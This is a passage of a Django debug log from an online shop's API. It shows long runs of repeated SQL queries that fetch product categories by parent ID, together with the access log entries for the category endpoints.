"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:20,590 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:20,594 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:20,598 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:20,602 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:20,607 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:20,611 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:20,615 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:20,619 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:20,623 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:20,629 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:20,633 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:20,637 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:20,641 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:20,645 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:20,651 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:20,655 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:20,659 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:20,663 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:20,667 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:20,672 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:20,677 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:20,681 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:20,685 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:20,691 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:20,695 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:22,486 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 18; args=(18,) DEBUG 2019-12-20 02:38:22,492 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:22,495 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() [20/Dec/2019 02:38:22] "GET /api/v1/categories/18 HTTP/1.0" 200 197 DEBUG 2019-12-20 02:38:22,504 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:22,509 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:22,512 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:38:22,515 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:22,518 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:22,520 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:22,523 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:22,525 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:22,529 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:22,531 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:22,533 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:22,536 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:22,538 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:22,542 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:22,544 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:22,546 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:22,549 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:22,551 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:22,556 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:22,559 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:22,561 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:22,564 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:22,567 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:22,571 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:22,576 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:22,579 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:22,583 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:22,586 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:22,590 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:22,595 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:22,598 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:22,601 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:22,604 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:22,607 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:22,612 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:22,615 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:22,618 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:22,621 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:22,624 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 